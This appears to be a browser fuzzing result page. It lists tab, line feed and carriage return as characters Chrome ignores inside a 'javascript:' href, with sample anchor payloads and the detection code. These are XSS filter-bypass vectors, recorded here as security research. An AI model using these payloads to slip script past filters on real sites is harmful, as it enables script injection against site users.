Characters that can precede the javascript protocol copy
Characters that can precede the javascript protocol in html
Created by: l4wio
Created on: Saturday, May 18, 2024 at 8:49:52 PM
Updated on: Thursday, July 25, 2024 at 1:13:01 AM
Vector type: XSS
Template used:
<a href="javas$[chr]cript:test.com/" id="test"></a>
Code used after fuzz:
if(document.getElementById("test").protocol=="javascript:"){log($[i])}Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<a href="javas cript:test.com/" id="test"></a>
<a href="javas
cript:test.com/" id="test"></a>
<a href="javas
cript:test.com/" id="test"></a>
Fuzz results
Chrome 125.0.0.0 Unknown Unknown
Found 3 results
| Dec | Hex | Chr |
|---|---|---|
| 9 | 09 | HT |
| Dec | Hex | Chr |
|---|---|---|
| 10 | 0a | LF |
| Dec | Hex | Chr |
|---|---|---|
| 13 | 0d | CR |